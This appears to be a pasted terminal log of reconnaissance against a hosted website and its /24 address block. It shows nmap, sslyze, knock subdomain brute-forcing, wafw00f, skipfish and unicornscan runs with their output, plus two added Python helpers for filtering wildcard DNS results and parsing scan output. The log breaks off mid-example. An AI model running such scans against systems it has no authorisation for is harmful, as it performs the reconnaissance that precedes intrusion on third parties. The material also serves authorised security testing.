Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Uptime guess: 0.003 days (since Sun May 29 12:53:57 2016)
Network Distance: 17 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 3.37 ms 192.168.1.1
2 ...
3 10.25 ms 172.17.19.169
4 13.05 ms 172.17.18.61
5 13.14 ms 172.19.240.133
6 12.84 ms 93.186.128.245
7 10.91 ms 195.22.205.155
8 11.54 ms 4.68.111.165
9 ...
10 106.27 ms 4.15.136.118
11 106.89 ms 184.168.6.83
12 106.79 ms 184.168.6.83
13 ... 16
17 108.63 ms 198.71.232.3

NSE: Script Post-scanning.
Initiating NSE at 12:58
Completed NSE at 12:58, 0.00s elapsed
Initiating NSE at 12:58
Completed NSE at 12:58, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3216.79 seconds
Raw packets sent: 4123 (155.388KB) | Rcvd: 42 (2.672KB)


  692. USE SSLYZE
  693.  
  694. ┌─[root@parrot]─[~]
  695. └──╼ #sslyze --regular 198.71.232.3:443
  696.  
  697.  
  698. REGISTERING AVAILABLE PLUGINS
  699. -----------------------------
  700.  
  701. PluginSessionRenegotiation
  702. PluginCompression
  703. PluginSessionResumption
  704. PluginCertInfo
  705. PluginOpenSSLCipherSuites
  706.  
  707.  
  708.  
  709. CHECKING HOST(S) AVAILABILITY
  710. -----------------------------
  711.  
  712. 198.71.232.3:443 => 198.71.232.3:443
  713.  
  714.  
  715.  
  716. SCAN RESULTS FOR 198.71.232.3:443 - 198.71.232.3:443
  717. ----------------------------------------------------
  718.  
  719. Unhandled exception when processing --compression:
  720. utils.ctSSL.errors.ctSSLFeatureNotAvailable - Could not enable Zlib compression: OpenSSL was not built with Zlib support ?
  721.  
  722. * Certificate :
  723. Validation w/ Mozilla's CA Store: Certificate is Trusted
  724. Hostname Validation: MISMATCH
  725. SHA1 Fingerprint: 95A592DAFDD9DCB8E55455991D1B5AE17F0FD2C7
  726.  
  727. Common Name: *.godaddysites.com
  728. Issuer: /C=US/ST=Arizona/L=Scottsdale/O=GoDaddy.com, Inc./OU=http://certificates.godaddy.com/repository/CN=Go Daddy Secure Certification Authority/serialNumber=07969287
  729. Serial Number: 4B09760F282ABD
  730. Not Before: Dec 9 21:03:50 2013 GMT
  731. Not After: Dec 9 21:03:50 2016 GMT
  732. Signature Algorithm: sha1WithRSAEncryption
  733. Key Size: 2048
  734. X509v3 Subject Alternative Name: DNS:*.godaddysites.com, DNS:godaddysites.com
  735.  
  736. * Session Renegotiation :
  737. Client-initiated Renegotiations: Honored
  738. Secure Renegotiation: Supported
  739.  
  740. Unhandled exception when processing --sslv2:
  741. utils.ctSSL.errors.ctSSLFeatureNotAvailable - SSLv2 disabled.
  742.  
  743. * Session Resumption :
  744. With Session IDs: Not supported (0 successful, 5 failed, 0 errors, 5 total attempts).
  745. With TLS Session Tickets: Not Supported - TLS ticket assigned but not accepted.
  746.  
  747. * TLSV1_1 Cipher Suites :
  748.  
  749. Rejected Cipher Suite(s): Hidden
  750.  
  751. Preferred Cipher Suite:
  752. ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found
  753.  
  754. Accepted Cipher Suite(s):
  755. ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found
  756. CAMELLIA256-SHA 256 bits HTTP 404 Not Found
  757. AES256-SHA 256 bits HTTP 404 Not Found
  758. ECDHE-RSA-AES128-SHA 128 bits HTTP 404 Not Found
  759. CAMELLIA128-SHA 128 bits HTTP 404 Not Found
  760. AES128-SHA 128 bits HTTP 404 Not Found
  761. ECDHE-RSA-DES-CBC3-SHA 112 bits HTTP 404 Not Found
  762. DES-CBC3-SHA 112 bits HTTP 404 Not Found
  763.  
  764. Unknown Errors: None
  765.  
  766. * TLSV1_2 Cipher Suites :
  767.  
  768. Rejected Cipher Suite(s): Hidden
  769.  
  770. Preferred Cipher Suite:
  771. ECDHE-RSA-AES256-GCM-SHA384256 bits HTTP 404 Not Found
  772.  
  773. Accepted Cipher Suite(s):
  774. ECDHE-RSA-AES256-SHA384 256 bits HTTP 404 Not Found
  775. ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found
  776. ECDHE-RSA-AES256-GCM-SHA384256 bits HTTP 404 Not Found
  777. CAMELLIA256-SHA 256 bits HTTP 404 Not Found
  778. AES256-SHA256 256 bits HTTP 404 Not Found
  779. AES256-SHA 256 bits HTTP 404 Not Found
  780. AES256-GCM-SHA384 256 bits HTTP 404 Not Found
  781. ECDHE-RSA-AES128-SHA256 128 bits HTTP 404 Not Found
  782. ECDHE-RSA-AES128-SHA 128 bits HTTP 404 Not Found
  783. ECDHE-RSA-AES128-GCM-SHA256128 bits HTTP 404 Not Found
  784. CAMELLIA128-SHA 128 bits HTTP 404 Not Found
  785. AES128-SHA256 128 bits HTTP 404 Not Found
  786. AES128-SHA 128 bits HTTP 404 Not Found
  787. AES128-GCM-SHA256 128 bits HTTP 404 Not Found
  788. ECDHE-RSA-DES-CBC3-SHA 112 bits HTTP 404 Not Found
  789. DES-CBC3-SHA 112 bits HTTP 404 Not Found
  790.  
  791. Unknown Errors: None
  792.  
  793. * SSLV3 Cipher Suites :
  794.  
  795. Rejected Cipher Suite(s): Hidden
  796.  
  797. Preferred Cipher Suite: None
  798.  
  799. Accepted Cipher Suite(s): None
  800.  
  801. Unknown Errors: None
  802.  
  803. * TLSV1 Cipher Suites :
  804.  
  805. Rejected Cipher Suite(s): Hidden
  806.  
  807. Preferred Cipher Suite:
  808. ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found
  809.  
  810. Accepted Cipher Suite(s):
  811. ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found
  812. CAMELLIA256-SHA 256 bits HTTP 404 Not Found
  813. AES256-SHA 256 bits HTTP 404 Not Found
  814. ECDHE-RSA-AES128-SHA 128 bits HTTP 404 Not Found
  815. CAMELLIA128-SHA 128 bits HTTP 404 Not Found
  816. AES128-SHA 128 bits HTTP 404 Not Found
  817. ECDHE-RSA-DES-CBC3-SHA 112 bits HTTP 404 Not Found
  818. DES-CBC3-SHA 112 bits HTTP 404 Not Found
  819.  
  820. Unknown Errors: None
  821.  
  822.  
  823.  
  824. SCAN COMPLETED IN 3.07 S
  825. ------------------------
  826.  
  827. Install knock
  828.  
  829. ┌─[root@parrot]─[~]
  830. └──╼ #wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/knock/knock-1.5.tar.gz
  831. --2016-05-29 12:19:30-- https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/knock/knock-1.5.tar.gz
  832. Resolving storage.googleapis.com (storage.googleapis.com)... 172.217.16.208, 2a00:1450:4001:801::2010
  833. Connecting to storage.googleapis.com (storage.googleapis.com)|172.217.16.208|:443... connected.
  834. HTTP request sent, awaiting response... 200 OK
  835. Length: 8484 (8.3K) [application/octet-stream]
  836. Saving to: ‘knock-1.5.tar.gz’
  837.  
  838. knock-1.5.tar.gz 100%[=====================>] 8.29K --.-KB/s in 0.002s
  839.  
  840. 2016-05-29 12:19:36 (4.03 MB/s) - ‘knock-1.5.tar.gz’ saved [8484/8484]
  841.  
  842. ┌─[root@parrot]─[~]
  843. └──╼ #ls
  844. Desktop Downloads Music Public Videos
  845. Documents knock-1.5.tar.gz Pictures Templates
  846.  
  847. ┌─[root@parrot]─[~]
  848. └──╼ #tar -xvzf knock-1.5.tar.gz
  849. knock.py
  850.  
  851. ┌─[root@parrot]─[~]
  852. └──╼ #cp knock.py Desktop
  853.  
  854. ┌─[root@parrot]─[~]
  855. └──╼ #cd Desktop/
  856.  
  857. ┌─[root@parrot]─[~/Desktop]
  858. └──╼ #chmod +x knock.py
  859.  
  860. USE KNOCK
  861.  
  862. $ python knock.py <option> <url>
  863.  
  864. Rapid Scan
  865.  
  866. Scanning with internal wordlist:
  867. $ python knock.py <url>
  868.  
  869. Scanning with external wordlist:
  870. $ python knock.py <url> <wordlist>
  871.  
  872. Options
  873. -zt Zone Transfer discovery:
  874.  
  875. $ python knock.py -zt <url>
  876. -dns Dns resolver:
  877.  
  878. $ python knock.py -dns <url>
  879. -wc Wildcard testing:
  880.  
  881. $ python knock.py -wc <url>
  882. -bw Wildcard bypass:
  883.  
  884. $ python knock.py -bw <stringexclude> <url>
  885.  
  886. ┌─[root@parrot]─[~/Desktop]
  887. └──╼ #./knock.py vyxunbnbs.com --wordlist /root/Desktop/rockyou.txt
  888. Knock v1.5 by Gianni 'guelfoweb' Amato ( http://knock.googlecode.com )
  889.  
  890. [+] Testing domain
  891. www.vyxunbnbs.com 198.71.232.3
  892. [+] Dns resolving
  893. Domain name Ip address Name server
  894. vyxunbnbs.com 198.71.232.3 ip-198-71-232-3.ip.secureserver.net
  895. Found 1 host(s) for vyxunbnbs.com
  896. [+] Testing wildcard
  897.  
  898. Wildcard enabled! Try with -bw option
  899. Example: knock -bw 404 vyxunbnbs.com
  900.  
  901. ┌─[root@parrot]─[~/Desktop]
  902. └──╼ #./knock.py -bw 404 vyxunbnbs.com
  903. Knock v1.5 by Gianni 'guelfoweb' Amato ( http://knock.googlecode.com )
  904.  
  905. [+] Testing domain
  906. www.vyxunbnbs.com 198.71.232.3
  907. [+] Dns resolving
  908. Domain name Ip address Name server
  909. vyxunbnbs.com 198.71.232.3 ip-198-71-232-3.ip.secureserver.net
  910. Found 1 host(s) for vyxunbnbs.com
  911. [+] Bypass wildcard
  912. 0.vyxunbnbs.com
  913. 01.vyxunbnbs.com
  914. 02.vyxunbnbs.com
  915. 03.vyxunbnbs.com
  916. 1.vyxunbnbs.com
  917.  
  918. --snip--
  919.  
  920. Found 1904 subdomain(s) in 523.4 second(s)
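Knock's "Wildcard enabled!" message means any label under the domain resolves, so a wordlist run returns mostly noise (the 1904 "subdomains" above). The following is an added example, not code from knock or from the original paste: it shows the check behind that message and how to drop candidates whose only answer is the wildcard answer. The zone data and resolver are constructed so it runs offline.

```python
import random
import string

# Constructed zone data standing in for real DNS answers (no live lookup):
# two names have their own records and a wildcard answers every other label.
FAKE_ZONE = {
    "www.example.test": {"198.51.100.3"},
    "mail.example.test": {"198.51.100.9"},
}
WILDCARD_ANSWER = {"198.51.100.3"}

def fake_resolve(name):
    """Stand-in resolver (assumed API): returns the set of A records for a name."""
    if name in FAKE_ZONE:
        return set(FAKE_ZONE[name])
    if name.endswith(".example.test"):
        return set(WILDCARD_ANSWER)
    return set()

def random_label(length=12):
    alphabet = string.ascii_lowercase + string.digits
    return "".join(random.choice(alphabet) for _ in range(length))

def detect_wildcard(domain, resolve, probes=3):
    """Resolve several random labels under domain. A plain zone answers none
    of them; a wildcard zone answers all of them the same way. The answers
    shared by every probe form the wildcard fingerprint (empty = no wildcard)."""
    answers = [resolve("%s.%s" % (random_label(), domain)) for _ in range(probes)]
    if not all(answers):
        return set()
    return set.intersection(*answers)

def filter_candidates(domain, labels, resolve):
    """Return (wildcard_fingerprint, {fqdn: ips}) keeping only names whose
    answer differs from the wildcard answer. Caveat: a real host that shares
    the wildcard address (www above) is dropped as well; knock's -bw takes an
    exclusion string (404 in the run above) to separate those cases instead."""
    wildcard = detect_wildcard(domain, resolve)
    found = {}
    for label in labels:
        fqdn = "%s.%s" % (label, domain)
        ips = resolve(fqdn)
        if not ips:
            continue
        if wildcard and ips <= wildcard:
            continue  # nothing but the wildcard answer: not evidence of a host
        found[fqdn] = ips
    return wildcard, found

if __name__ == "__main__":
    wc, hosts = filter_candidates("example.test", ["www", "mail", "ftp", "dev"], fake_resolve)
    print("wildcard answer:", sorted(wc))
    print("real hosts:", hosts)
```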
  921.  
  922.  
  923. CHECK IF THE SITE IS BEHIND A FIREWALL
  924.  
  925. ┌─[root@parrot]─[~]
  926. └──╼ #wafw00f 198.71.232.3
  927.  
  928. ^ ^
  929. _ __ _ ____ _ __ _ _ ____
  930. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  931. | V V // o // _/ | V V // 0 // 0 // _/
  932. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  933. <
  934. ...'
  935.  
  936. WAFW00F - Web Application Firewall Detection Tool
  937.  
  938. By Sandro Gauci && Wendel G. Henrique
  939.  
  940. Checking http://198.71.232.3
  941. The site http://198.71.232.3 is behind a SecureIIS
  942. Number of requests: 9
  943.  
  944.  
  945. CHECK THE SITE WITH SKIPFISH
  946.  
  947. ┌─[root@parrot]─[~]
  948. └──╼ #skipfish -o /tmp/snep http://www.vyxunbnbs.com
  949.  
  950.  
  951. skipfish version 2.10b by lcamtuf@google.com
  952. 
  953. - www.vyxunbnbs.com -
  954. 
  955. Scan statistics:
  956. 
  957. Scan time : 0:00:32.334
  958. HTTP requests : 1728 (53.4/s), 7460 kB in, 408 kB out (243.3 kB/s)
  959. Compression : 5611 kB in, 26863 kB out (65.4% gain)
  960. HTTP faults : 1 net errors, 0 proto errors, 1 retried, 0 drops
  961. TCP handshakes : 19 total (90.9 req/conn)
  962. TCP faults : 0 failures, 0 timeouts, 8 purged
  963. External links : 5456 skipped
  964. Reqs pending : 0
  965. 
  966. Database statistics:
  967. 
  968. Pivots : 23 total, 22 done (95.65%)
  969. In progress : 0 pending, 0 init, 1 attacks, 0 dict
  970. Missing nodes : 0 spotted
  971. Node types : 1 serv, 1 dir, 20 file, 0 pinfo, 0 unkn, 1 par, 0 val
  972. Issues found : 6 info, 1 warn, 102 low, 39 medium, 0 high impact
  973. Dict size : 17 words (17 new), 2 extensions, 256 candidates
  974. Signatures : 77 total
  978.  
  979. [+] Copying static resources...
  980. [+] Sorting and annotating crawl nodes: 23
  981. [+] Looking for duplicate entries: 23
  982. [+] Counting unique nodes: 14
  983. [+] Saving pivot data for third-party tools...
  984. [+] Writing scan description...
  985. [+] Writing crawl tree: 23
  986. [+] Generating summary views...
  987. [+] Report saved to '/tmp/snep/index.html' [0xed916f54].
  988. [+] This was a great day for science!
  989.  
  990. ┌─[root@parrot]─[~]
  991. └──╼ #firefox /tmp/snep/index.html
  992.  
  993. CHECK THE SITE WITH UNICORNSCAN
  994.  
  995. ┌─[root@parrot]─[~]
  996. └──╼ #unicornscan -r200 -Iv -eosdetect -mT 198.71.232.3:3306,80,443
  997.  
  998. adding 198.71.232.3/32 mode `TCPscan' ports `3306,80,443' pps 200
  999. using interface(s) eth0
  1000. scaning 1.00e+00 total hosts with 3.00e+00 total packets, should take a little longer than 7 Seconds
  1001. sender statistics 199.2 pps with 3 packets sent total
  1002. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1003. TCP open 198.71.232.3:80 ttl 47
  1004. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1005. TCP open 198.71.232.3:443 ttl 47
  1006. listener statistics 72 packets recieved 0 packets droped and 0 interface drops
  1007. TCP open http[ 80] from 198.71.232.3 ttl 47 OS `'
  1008. TCP open https[ 443] from 198.71.232.3 ttl 47 OS `'
  1009.  
  1010. UDP Scan
  1011.  
  1012. ┌─[root@parrot]─[~]
  1013. └──╼ #unicornscan -mU -r200 -I 198.71.232.3
  1014.  
  1015.  
  1016. Where
  1017.  
  1018. __________________________________________________________________
  1019. -mU : is mode UDP
  1020. -I : Display Immediately
  1021. 198.71.232.3 : target IP
  1022. :53 : optional port suffix on the target (for example 198.71.232.3:53); none is given above, so the default UDP port list is scanned
  1023. -r200 : 200 Packets per second
  1024. ___________________________________________________________________
  1025.  
  1026. TCP Scan
  1027.  
  1028. ┌─[✗]─[root@parrot]─[~]
  1029. └──╼ #unicornscan -r500 -mT 198.71.232.1/24:80,443,445,339
  1030.  
  1031.  
  1032. Where
  1033.  
  1034. __________________________________________________________________
  1035. -mT : is mode TCP
  1036. 198.71.232.1/24 : target network range ( block )
  1037. :80,443,445,339 : ports
  1038. -r500 : 500 Packets per second
  1039. ___________________________________________________________________
  1040.  
  1041. Many other options can be passed; for example, for an ACK scan use -mTsA
  1042.  
  1043. SYN : -mT
  1044. ACK scan : -mTsA
  1045. Fin scan : -mTsF
  1046. Null scan : -mTs
  1047. Xmas scan : -mTsFPU
  1048. Connect Scan : -msf -Iv
  1049. scan with all options : -mTFSRPAUEC
  1050. Syn + osdetect : -eosdetect -Iv (-mT)
  1051. scan ports 1 through 5 : (-mT) host:1-5
  1052.  
  1053. Practical Use Case
  1054.  
  1055. Scanning for MySQL (3306) together with the HTTP and HTTPS ports
  1056.  
  1057. ┌─[root@parrot]─[~]
  1058. └──╼ #unicornscan -r200 -Iv -eosdetect -mT vyxunbnbs.com:3306,80,443
  1059. adding 198.71.232.3/32 mode `TCPscan' ports `3306,80,443' pps 200
  1060. using interface(s) eth0
  1061. scaning 1.00e+00 total hosts with 3.00e+00 total packets, should take a little longer than 7 Seconds
  1062. sender statistics 194.9 pps with 3 packets sent total
  1063. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1064. TCP open 198.71.232.3:80 ttl 47
  1065. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1066. TCP open 198.71.232.3:443 ttl 47
  1067. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1068. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 4372 and we have 1550
  1069. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 9414 and we have 1550
  1070. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1071. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1072. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 3254 and we have 1550
  1073. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1074. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 4372 and we have 1550
  1075. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1076. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 4094 and we have 1550
  1077. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1078. listener statistics 193 packets recieved 0 packets droped and 0 interface drops
  1079. TCP open http[ 80] from 198.71.232.3 ttl 47 OS `'
  1080. TCP open https[ 443] from 198.71.232.3 ttl 47 OS `'
  1081.  
  1082. ┌─[root@parrot]─[~]
  1083. └──╼ #unicornscan -eosdetect -Iv -v vyxunbnbs.com
  1084. adding 198.71.232.3/32 mode `TCPscan' ports `7,9,11,13,18,19,21-23,25,37,39,42,49,50,53,65,67-70,79-81,88,98,100,105-107,109-111,113,118,119,123,129,135,137-139,143,150,161-164,174,177-179,191,199-202,204,206,209,210,213,220,345,346,347,369-372,389,406,407,422,443-445,487,500,512-514,517,518,520,525,533,538,548,554,563,587,610-612,631-634,636,642,653,655,657,666,706,750-752,765,779,808,873,901,923,941,946,992-995,1001,1023-1030,1080,1210,1214,1234,1241,1334,1349,1352,1423-1425,1433,1434,1524,1525,1645,1646,1649,1701,1718,1719,1720,1723,1755,1812,1813,2048-2050,2101-2104,2140,2150,2233,2323,2345,2401,2430,2431,2432,2433,2583,2628,2776,2777,2988,2989,3050,3130,3150,3232,3306,3389,3456,3493,3542-3545,3632,3690,3801,4000,4400,4321,4567,4899,5002,5136-5139,5150,5151,5222,5269,5308,5354,5355,5422-5425,5432,5503,5555,5556,5678,6000-6007,6346,6347,6543,6544,6789,6838,6666-6670,7000-7009,7028,7100,7983,8079-8082,8088,8787,8879,9090,9101-9103,9325,9359,10000,10026,10027,10067,10080,10081,10167,10498,11201,15345,17001-17003,18753,20011,20012,21554,22273,26274,27374,27444,27573,31335-31338,31787,31789,31790,31791,32668,32767-32780,33390,47262,49301,54320,54321,57341,58008,58009,58666,59211,60000,60006,61000,61348,61466,61603,63485,63808,63809,64429,65000,65506,65530-65535' pps 300
  1085. using interface(s) eth0
  1086. added module payload for port 1900 proto 17
  1087. added module payload for port 80 proto 6
  1088. added module payload for port 5060 proto 17
  1089. added module payload for port 53 proto 17
  1090. added module payload for port 80 proto 6
  1091. added module payload for port 518 proto 17
  1092. scaning 1.00e+00 total hosts with 3.38e+02 total packets, should take a little longer than 8 Seconds
  1093. drone type Unknown on fd 4 is version 1.1
  1094. drone type Unknown on fd 5 is version 1.1
  1095. added module payload for port 1900 proto 17
  1096. added module payload for port 80 proto 6
  1097. added module payload for port 5060 proto 17
  1098. added module payload for port 53 proto 17
  1099. added module payload for port 80 proto 6
  1100. added module payload for port 518 proto 17
  1101. scan iteration 1 out of 1
  1102. using pcap filter: `dst 192.168.1.83 and ! src 192.168.1.83 and (tcp)'
  1103. using TSC delay
  1104. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1105. TCP open 198.71.232.3:80 ttl 47
  1106. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1107. TCP open 198.71.232.3:443 ttl 47
  1108. sender statistics 290.1 pps with 338 packets sent total
  1109. listener statistics 166 packets recieved 0 packets droped and 0 interface drops
  1110. TCP open http[ 80] from 198.71.232.3 ttl 47 OS `'
  1111. TCP open https[ 443] from 198.71.232.3 ttl 47 OS `'
  1112.  
  1113.  
  1114. ┌─[root@parrot]─[~]
  1115. └──╼ #unicornscan -r200 -Iv -eosdetect -mT vyxunbnbs.com:3306,80,443
  1116. adding 198.71.232.3/32 mode `TCPscan' ports `3306,80,443' pps 200
  1117. using interface(s) eth0
  1118. scaning 1.00e+00 total hosts with 3.00e+00 total packets, should take a little longer than 7 Seconds
  1119. sender statistics 138.1 pps with 3 packets sent total
  1120. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1121. TCP open 198.71.232.3:80 ttl 47
  1122. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1123. TCP open 198.71.232.3:443 ttl 47
  1124. listener statistics 142 packets recieved 0 packets droped and 0 interface drops
  1125. TCP open http[ 80] from 198.71.232.3 ttl 47 OS `'
  1126. TCP open https[ 443] from 198.71.232.3 ttl 47 OS `'
  1127.  
  1128. ┌─[root@parrot]─[~]
  1129. └──╼ #unicornscan -r200 -Iv -eosdetect -mT 198.71.232.3:3306,80,443
  1130. adding 198.71.232.3/32 mode `TCPscan' ports `3306,80,443' pps 200
  1131. using interface(s) eth0
  1132. scaning 1.00e+00 total hosts with 3.00e+00 total packets, should take a little longer than 7 Seconds
  1133. sender statistics 199.3 pps with 3 packets sent total
  1134. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1135. TCP open 198.71.232.3:80 ttl 47
  1136. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1137. TCP open 198.71.232.3:443 ttl 47
  1138. listener statistics 146 packets recieved 0 packets droped and 0 interface drops
  1139. TCP open http[ 80] from 198.71.232.3 ttl 47 OS `'
  1140. TCP open https[ 443] from 198.71.232.3 ttl 47 OS `'
  1141.  
  1142.  
  1143. ┌─[root@parrot]─[~]
  1144. └──╼ #unicornscan -msf -v -I 198.71.232.3/24
  1145. adding 198.71.232.0/24 mode `TCPscan' ports `7,9,11,13,18,19,21-23,25,37,39,42,49,50,53,65,67-70,79-81,88,98,100,105-107,109-111,113,118,119,123,129,135,137-139,143,150,161-164,174,177-179,191,199-202,204,206,209,210,213,220,345,346,347,369-372,389,406,407,422,443-445,487,500,512-514,517,518,520,525,533,538,548,554,563,587,610-612,631-634,636,642,653,655,657,666,706,750-752,765,779,808,873,901,923,941,946,992-995,1001,1023-1030,1080,1210,1214,1234,1241,1334,1349,1352,1423-1425,1433,1434,1524,1525,1645,1646,1649,1701,1718,1719,1720,1723,1755,1812,1813,2048-2050,2101-2104,2140,2150,2233,2323,2345,2401,2430,2431,2432,2433,2583,2628,2776,2777,2988,2989,3050,3130,3150,3232,3306,3389,3456,3493,3542-3545,3632,3690,3801,4000,4400,4321,4567,4899,5002,5136-5139,5150,5151,5222,5269,5308,5354,5355,5422-5425,5432,5503,5555,5556,5678,6000-6007,6346,6347,6543,6544,6789,6838,6666-6670,7000-7009,7028,7100,7983,8079-8082,8088,8787,8879,9090,9101-9103,9325,9359,10000,10026,10027,10067,10080,10081,10167,10498,11201,15345,17001-17003,18753,20011,20012,21554,22273,26274,27374,27444,27573,31335-31338,31787,31789,31790,31791,32668,32767-32780,33390,47262,49301,54320,54321,57341,58008,58009,58666,59211,60000,60006,61000,61348,61466,61603,63485,63808,63809,64429,65000,65506,65530-65535' pps 300
  1146. using interface(s) eth0
  1147. scaning 2.56e+02 total hosts with 8.65e+04 total packets, should take a little longer than 4 Minutes, 55 Seconds
  1148. connected 192.168.1.83:39367 -> 198.71.232.3:443
  1149. TCP open 198.71.232.3:443 ttl 47
  1150. connected 192.168.1.83:31012 -> 198.71.232.5:443
  1151. TCP open 198.71.232.5:443 ttl 110
  1152. connected 192.168.1.83:7126 -> 198.71.232.4:443
  1153. TCP open 198.71.232.4:443 ttl 47
  1154. connected 192.168.1.83:32420 -> 198.71.232.7:443
  1155. TCP open 198.71.232.7:443 ttl 47
  1156. connected 192.168.1.83:6417 -> 198.71.232.6:443
  1157. TCP open 198.71.232.6:443 ttl 47
  1158. connected 192.168.1.83:64190 -> 198.71.232.4:80
  1159. TCP open 198.71.232.4:80 ttl 47
  1160. connected 192.168.1.83:36816 -> 198.71.232.6:80
  1161. TCP open 198.71.232.6:80 ttl 47
  1162. connected 192.168.1.83:56533 -> 198.71.232.7:80
  1163. TCP open 198.71.232.7:80 ttl 47
  1164. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1165. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 1722 and we have 1550
  1166. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1167. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1168. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1169. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 5435 and we have 1550
  1170. connected 192.168.1.83:5563 -> 198.71.232.7:22
  1171. TCP open 198.71.232.7:22 ttl 47
  1172. connected 192.168.1.83:7734 -> 198.71.232.1:25
  1173. TCP open 198.71.232.1:25 ttl 47
  1174. connected 192.168.1.83:43683 -> 198.71.232.0:25
  1175. TCP open 198.71.232.0:25 ttl 47
  1176. connected 192.168.1.83:30502 -> 198.71.232.2:25
  1177. TCP open 198.71.232.2:25 ttl 47
  1178. sender statistics 290.9 pps with 86528 packets sent total
  1179. listener statistics 180 packets recieved 0 packets droped and 0 interface drops
  1180. TCP open smtp[ 25] from 198.71.232.0 ttl 47
  1181. TCP open smtp[ 25] from 198.71.232.1 ttl 47
  1182. TCP open smtp[ 25] from 198.71.232.2 ttl 47
  1183. TCP open https[ 443] from 198.71.232.3 ttl 47
  1184. TCP open http[ 80] from 198.71.232.4 ttl 47
  1185. TCP open https[ 443] from 198.71.232.4 ttl 47
  1186. TCP open https[ 443] from 198.71.232.5 ttl 110
  1187. TCP open http[ 80] from 198.71.232.6 ttl 47
  1188. TCP open https[ 443] from 198.71.232.6 ttl 47
  1189. TCP open ssh[ 22] from 198.71.232.7 ttl 47
  1190. TCP open http[ 80] from 198.71.232.7 ttl 47
  1191. TCP open https[ 443] from 198.71.232.7 ttl 47
  1192.  
  1193.  
  1194. ┌─[✗]─[root@parrot]─[~]
  1195. └──╼ #unicornscan -mU -v -I 198.71.232.3/24
  1196. adding 198.71.232.0/24 mode `UDPscan' ports `7,9,11,13,17,19,20,37,39,42,49,52-54,65-71,81,111,161,123,136-170,514-518,630,631,636-640,650,653,921,1023-1030,1900,2048-2050,27900,27960,32767-32780,32831' pps 300
  1197. using interface(s) eth0
  1198. scaning 2.56e+02 total hosts with 2.66e+04 total packets, should take a little longer than 1 Minutes, 35 Seconds
  1199. UDP open 192.168.1.1:53 ttl 64
  1200.  
  1201. --snip--
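Added example, not from the paste or from unicornscan: it parses the "proto open service[ port] from ip ttl N" summary lines in the format shown above into a per-host table, reports listeners that fall outside the exposure you expect (the smtp and ssh listeners in the /24 scan above would surface this way), and flags hosts whose reply TTL differs from their neighbours' (198.71.232.5 answers with ttl 110 above, which points to a different OS or network path). The sample lines are constructed from the page's format and the allowlist is an assumption.

```python
import re
from collections import Counter, defaultdict

# Constructed sample in the format of the unicornscan output shown above.
SAMPLE_OUTPUT = """\
adding 198.71.232.0/24 mode `TCPscan' ports `22,25,80,443' pps 300
connected 192.168.1.83:39367 -> 198.71.232.3:443
TCP open 198.71.232.3:443 ttl 47
sender statistics 290.9 pps with 86528 packets sent total
TCP open smtp[ 25] from 198.71.232.1 ttl 47
TCP open https[ 443] from 198.71.232.3 ttl 47
TCP open http[ 80] from 198.71.232.4 ttl 47
TCP open https[ 443] from 198.71.232.4 ttl 47
TCP open https[ 443] from 198.71.232.5 ttl 110
TCP open ssh[ 22] from 198.71.232.7 ttl 47
TCP open https[ 443] from 198.71.232.7 ttl 47
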